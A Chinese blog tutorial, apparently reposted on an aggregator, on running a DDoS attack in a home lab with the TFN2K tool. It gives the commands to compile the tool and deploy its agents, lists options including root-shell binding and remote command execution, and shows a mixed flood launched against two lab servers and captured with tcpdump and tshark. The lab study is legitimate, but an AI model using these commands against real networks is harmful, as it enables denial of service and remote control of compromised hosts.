软件TFN 2K的分布式拒绝攻击(DDos)实战详解

写在前头


本人写这篇博客的目的,并不是我想成为黑客或者鼓励大家做损坏任何人安全和利益的事情。因科研需要,我学习软件TFN 2K的分布式拒绝攻击,只是分享自己的学习过程和经历,有助于大家更好的关注到网络安全及网络维护上。

需要强调的是,进行未经授权的网络攻击是非法的,违反了法律法规,可能导致刑事起诉和重大法律后果。

一定要尊重法律和道德,不要参与或支持任何网络攻击行为。如果你是网络管理员,应该采取适当的安全措施来保护你的网络免受DDoS攻击的影响。

这篇文章仅供技术参考,千万不要用其做一些违法操作!如果你利用它来做一些不合法的事情,那结果与我无关。

一. TFN 2K概述


什么是DDos

DDoS攻击(Distributed Denial of Service Attack),即分布式拒绝服务攻击。最简单的定义就是:多台电脑对一台电脑的攻击,占用目标服务器或网络资源的攻击行为

什么是TFN 2K

TFN 2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击,是DDos的实现工具

攻击体系

主控端—运行TFN客户端,来遥控并指定攻击目标,更改攻击方法

代理端—被植入并运行TD进程的牺牲品,接受TFN的指挥,攻击的实施者

在这里插入图片描述

TFN 2K特性

  • 主控端通过随机TCPUDPICMP之一的数据包向代理端主机发送命令,攻击方法包括TCP/SYNUDPICMP/PING、混合攻击、TARGA3等。
  • 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息。

二. 安装配置


我在个人本地服务器上部署了几台设备,来模拟应用场景。网络拓扑如下,需实现Master控制两台Attacker攻击两台Defender

在这里插入图片描述

2.1 安装TFN


在主控端Master下载TFN 2K软件(因软件的特殊性,本人概不提供相关的下载渠道),设下载并解压的文件夹名称为TFN2K

切换至下载目录,对软件进行编译,同时设置一个八位数的登录密码

cd TFN2K/src
make

编译后即可生成tfntd
在这里插入图片描述
登录所有代理端,将主机端的td下载到代理端本地

scp root@192.166.60.1:/root/TFN2K/src/td ./
scp root@192.166.61.1:/root/TFN2K/src/td ./

td赋权,并执行文件,此时,代理端部署完毕

chmod 777 td
./td

可利用ps -a查看进程,发现td已经在运行了
在这里插入图片描述

2.2 TFN命令讲解


可在主控端输入./tfn查看相关参数

  • -P protocol:设置服务器通信的协议。可以是ICMPUDPTCP。使用随机协议作为默认值
  • -D n:为每个真实的请求发送n个虚假请求以诱骗目标
  • -S hostIp:可指定源ip。默认情况下随机欺骗
  • -f hostlist:存储TFN的所有主控端的文件名,表示其中所有主控端均实现攻击操作
  • -h hostname:只利用该主控端发起攻击,也就是一对一的攻击,后面跟一个主机或IP地址
  • -p port:为SYN洪泛指定TCP目标端口
  • -c ID:攻击参数
    • -c 0 :停止攻击
    • -c 1:设置反欺骗等级设定,用法:-i 0(完全欺骗)到-i 3(/24个主机字节欺骗)
    • -c 2:改变攻击数据包大小,用法:-i <packet size in bytes>
    • -c 3:将根shell绑定到一个指定的端口,用法:-i<remote port>
    • -c 4UDP洪水,用法:-i victim@victim2@victim3@...
    • -c 5TCP/SYN洪水,用法:-i victim@...[-p目标端口]
    • -c 6ICMP/PING洪水,用法:-i victim@...
    • -c 7ICMP/SMURF洪水,用法:-i victim@broadcast@broadcast2@...
    • -c 8MIX flood(随机UDP/TCP/ICMP攻击),用法:-i victim@...
    • -c 9TARGA3洪水(IP堆栈渗透),用法:-i victim@...
    • -c 10:盲目执行远程shell命令,使用-i命令,一般还可用于远程命令控制

2.3 测试TD


在实现泛洪攻击前,先对所有的代理端进行测试,测试其是否可“听从”主控端的安排

创建host.txt文件用于记录所有运行了./td文件的代理端

echo "192.166.60.2" > host.txt
echo "192.166.61.2" > host.txt

操作tfn向所有的代理端实现创建文件夹的命令,一般创建的文件夹都和td在同一级目录

./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"

查看代理端可知,文件夹创建成功,表明主控端可操作所有的代理端
在这里插入图片描述

三. 攻击


3.1 准备工作


先为被攻击服务器安装流量抓包软件,在DF1上安装tcpdump

apt install tcpdump

测试抓取15秒内的流量,并输出为文件形式

tcpdump -i eth1 -w "getFlow.pcap" -G 15

DF2上安装tshark

apt install tshark
# 倘若不能安装便先安装wireshark
apt install wireshark

测试抓取15秒内的流量,并输出为文件形式

tshark -i eth1 -a duration:15 -w "getFlow.pcap"

3.2 发送攻击


开启流量捕获,利用控制端Master向代理端发出攻击请求,利用MIX flood攻击DF1DF2

./tfn -f /root/TFN2K/host.txt -c 8 -i 192.166.65.1@192.166.66.1

15秒后停止流量攻击

./tfn -f /root/TFN2K/host.txt -c 0

3.3 查看结果


查看DF1中捕获的流量,发现存在大量UDPTCP数据流

tcpdump -r getFlow.pcap

在这里插入图片描述
因没有直接记录数据大小,可以通过ls -l查看文件大小间接来判断捕获的数据流,可知确实捕获了大量数据
在这里插入图片描述
查看DF2中捕获的流量,DF2中更直观,表明捕获了约75万个数据流

tshark -r getFlow.pcap

在这里插入图片描述
通过ls -l查看文件大小,可知确实捕获了大量数据
在这里插入图片描述

3.4 解惑


我们发送的是MIX flood,表示随机UDP/TCP/ICMP攻击,但是在捕获流量的文件中并没有查看到ICMP类型的流量,这是为什么呢?

通过我查阅资料可知:ICMP洪泛攻击现已经过时,不再有效,网络管理员和服务提供商已经采取了各种防护措施,包括用于过滤恶意流量的设备和防火墙规则,这些自带的防护措施可以检测到大量的ICMP流量,并在检测到异常或过多的流量时采取措施,以减轻对目标系统的影响。但UDPTCP攻击可能更难检测和阻止,因为它们模拟更常见的网络通信模式。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/133348.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LabVIEW将视觉生成器AI用作OPC服务器

LabVIEW将视觉生成器AI用作OPC服务器 介绍如何将视觉生成器AI配置为OPC服务器&#xff0c;并使用共享变量共享视觉生成器AI生成的结果。OPC是一系列标准规范&#xff0c;定义了来自不同制造商的控制设备之间的实时数据通信。OPC数据访问通信是基于客户端服务器的通信。 共享系…

Java架构师缓存架构设计

目录 1 导学2 高性能概述2.1 高性能的定义和衡量指标2.2 如何实现高性能的计算机系统或软件程序2.3 木桶理论2.4 如何实现计算机系统或软件程序的高性能3 多级缓存设计3.1 浏览器缓存3.2 CDN缓存3.3 负载均衡的缓存3.4 进程内缓存3.5 分布式缓存4 缓存技术方案5 如何进行缓存拆…

cad由于找不到mfc140u.dll怎么回事?mfc140u.dll丢失的解决方法

当你在使用 CAD&#xff08;计算机辅助设计&#xff09;软件时&#xff0c;如果出现“找不到 mfc140u.dll”的错误提示&#xff0c;这通常意味着你的计算机上缺少这个重要的动态链接库文件。Mfc140u.dll 是 Microsoft Foundation Class&#xff08;MFC&#xff09;库的一部分&a…

IIS 解析漏洞复现

文章目录 IIS 解析漏洞复现1. 漏洞描述2. 漏洞复现3. 漏洞原因4. 安全加固5. 安全防护 IIS 解析漏洞复现 1. 漏洞描述 说明内容漏洞编号漏洞名称IIS 解析漏洞漏洞评级高危影响范围IIS 6.0及以前版本IIS 7.0IIS 7.5漏洞描述IIS 解析漏洞是指在 IIS 服务器上存在的安全漏洞&…

【postgresql】ERROR: integer out of range

查询文章都类似&#xff0c;只是类型没有对应上&#xff0c;根据实际情况处理。 前情 使用postgresql数据库数据库ID类型int4实体类代码private Long id; 异常 ### Cause: org.postgresql.util.PSQLException: ERROR: integer out of range ; ERROR: integer out of range;…

【RKNN】YOLO V5中pytorch2onnx,pytorch和onnx模型输出不一致,精度降低

在yolo v5训练的模型&#xff0c;转onnx&#xff0c;再转rknn后&#xff0c;测试发现&#xff1a; rknn模型&#xff0c;量化与非量化&#xff0c;相较于pytorch模型&#xff0c;测试精度都有降低onnx模型&#xff0c;相较于pytorch模型&#xff0c;测试精度也有降低&#xff…

VUE echarts 柱状图、折线图 双Y轴 显示

weekData: [“1周”,“2周”,“3周”,“4周”,“5周”,“6周”,“7周”,“8周”,“9周”,“10周”], //柱状图横轴 jdslData: [150, 220, 430, 360, 450, 680, 100, 450, 680, 200], // 折线图的数据 cyslData: [100, 200, 400, 300, 500, 500, 500, 450, 480, 400], // 柱状图…

pytorch学习第二篇:张量

tensor与numpy import torch import numpy as npnumpy数组 到 张量tensor n np.ones(5) t torch.from_numpy(n)NumPy 数组中的变化反映在张量中 np.add(n, 1, outn) print(f"t: {t}") print(f"n: {n}")张量到 NumPy 数 t torch.ones(5) print(f&quo…

消除springboot+thymeleaf时页面的红色波浪线告警

setting->Editor->Inspections取消掉Thymeleaf的√ 效果&#xff1a;

敏捷开发流程图Scrum

敏捷开发中的Scrum流程通常可以用一个简单的流程图来表示&#xff0c;以便更清晰地展示Scrum框架的各个阶段和活动。以下是一个常见的Scrum流程图示例&#xff1a; 转自&#xff1a;Leangoo.com 免费敏捷工具 这个流程图涵盖了Scrum框架的主要阶段和活动&#xff0c;其中包括&…

基于Springboot实现商务安全邮箱邮件收发系统项目【项目源码+论文说明】计算机毕业设计

基于Springboot实现商务安全邮箱邮件收发系统演示 摘要 随着社会的发展&#xff0c;社会的方方面面都在利用信息化时代的优势。计算机的优势和普及使得商务安全邮箱的开发成为必需。 本文以实际运用为开发背景&#xff0c;运用软件工程原理和开发方法&#xff0c;采用jsp技术…

基于小波变换的分形信号r指数求解算法matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 ................................................................... %通过功率谱密度曲线…